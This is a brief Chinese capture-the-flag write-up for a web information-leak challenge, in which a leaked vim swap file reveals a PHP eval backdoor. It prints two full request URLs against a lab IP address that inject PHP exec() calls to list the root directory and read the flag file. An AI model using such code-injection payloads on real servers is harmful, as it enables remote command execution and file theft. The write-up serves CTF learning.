[WebSec 信息泄露] php eval 与 vim 的临时交换文件
题目提示 vim
异常退出, 于是下载 .index.php.swp
进而通过 vim -r index.php.swp
恢复出如下代码
对源码分析后的 payload
:
ls
根目录
http://124.221.34.13:50004/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=$cmd%20=%20%27ls%20/%27;exec($cmd,%20$result,%20$var);var_dump($result);var_dump($var);
发现有 fl4444444g
这个可疑文件
cat
flag
http://124.221.34.13:50004/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=$cmd%20=%20%27cat%20/fl4444444g%27;exec($cmd,%20$result,%20$var);var_dump($result);var_dump($var);